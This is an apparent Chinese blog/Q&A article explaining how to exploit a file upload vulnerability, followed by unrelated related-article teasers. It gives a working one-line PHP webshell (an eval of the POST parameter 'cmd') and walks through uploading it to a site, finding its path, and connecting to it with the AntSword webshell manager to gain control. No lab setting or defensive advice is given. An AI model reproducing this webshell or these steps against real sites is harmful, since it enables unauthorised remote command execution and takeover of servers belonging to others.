当前位置:首页 > 每日看点

文件上传漏洞一般会怎么利用?

卡卷网1年前 (2025-05-07)每日看点344

准备知识:

一句话木马:<?php @eval($_POST['cmd']); ?>

木马连接工具如:AntSword(蚁剑)

首先把一句话木马写入到php文件中

文件上传漏洞一般会怎么利用?  第1张

然后找到一个上传文件的地方把php文件上传上去,比如:

文件上传漏洞一般会怎么利用?  第2张

上传木马后找到木马上传的位置

文件上传漏洞一般会怎么利用?  第3张

​编辑 把这个复制粘贴到地址栏里的链接后面,如下:

文件上传漏洞一般会怎么利用?  第4张

按回车

文件上传漏洞一般会怎么利用?  第5张

然后复制链接,打开AntSword,点击add

文件上传漏洞一般会怎么利用?  第6张

然后会弹出个框,在shell url地方粘贴刚才地址栏复制的链接,shell pwd地方输入cmd然后按add即可


文件上传漏洞一般会怎么利用?  第7张

双击刚才添加的

文件上传漏洞一般会怎么利用?  第8张

可以看到木马已经连接上了

文件上传漏洞一般会怎么利用?  第9张

扫描二维码推送至手机访问。

版权声明:本文由卡卷网发布,如需转载请注明出处。

本文链接:https://www.kajuan.net/ttnews/2025/05/12878.html

分享给朋友:

相关文章

推荐几个问卷调查平台?

推荐几个问卷调查平台?

我给大家免费推荐一些市面上不多,且稳定的免费的问卷平台,这个在网上都是能够搜索到的,有的还是世界500钱企业,这里推荐的基本上都是上市的问卷公司了。上面都是可以免费去注册的,对外公开开放的,做完了直接奖励美刀的,不需要兑换卡什么的。 C…

马云也搞不明白:为什么现在用户偏爱微信支付,而不是支付宝?

这题我会,我教马云一招。 你直接把你那破比支付宝的代码全删了,重新写一个。 打开支付宝直接就是一个大大的支付码,然后右上角按一下就是扫一扫。你要是还想保留你的其他那些乱七八糟的功能,麻烦将他们全部做到下拉菜单里。你这么设计我不说你能干死微信…

为什么有人觉得华为mate60只值2000?

为什么有人觉得华为mate60只值2000?

你以为买Mate60的人真的傻?真的那么爱国? 国庆前,我家那傻子加价800多买了一台Mate60,当时还被我骂他是傻子。 可是他说一回到公司就被老板同事朋友看到,拿去反复查看,都在惊叹他这么快就买到新机。 跟亲戚朋友聚会,别人一看就知道他…

如何进行 Elasticsearch 调优实践?

如何进行 Elasticsearch 调优实践?

面试官心理分析这个问题是肯定要问的,说白了,就是看你有没有实际干过 es,因为啥?其实 es 性能并没有你想象中那么好的。很多时候数据量大了,特别是有几亿条数据的时候,可能你会懵逼的发现,跑个搜索怎么一下 5~10s ,坑爹了。第一次搜索的…

如何评价小米14pro顶配可以选配卫星通话,小米15全系都无法选配?

如何评价小米14pro顶配可以选配卫星通话,小米15全系都无法选配?

雷总不是说了吗,我可以不用,但你不能没有。市面上OPPO Find X8 Pro和vivo X200 Pro的卫星通信版分别加价300,而荣耀Magic7和Magic7 Pro有卫星通信版且不加价,荣耀更显诚意。 我觉得有是更好的,虽然使用…

为什么闲鱼越做越差?

理想的闲鱼:卖家视角:4000块钱买的手机,用了半年不想用了,挂一个3000块,和买家一顿交流,最后2500块成交,我得到了回血,买家得到了便宜; 买家视角:想用一台4000块的手机,但是手里只有2500块,来到闲鱼和卖家一顿交流,最后25…

发表评论

访客

看不清,换一张

◎欢迎参与讨论,请在这里发表您的看法和观点。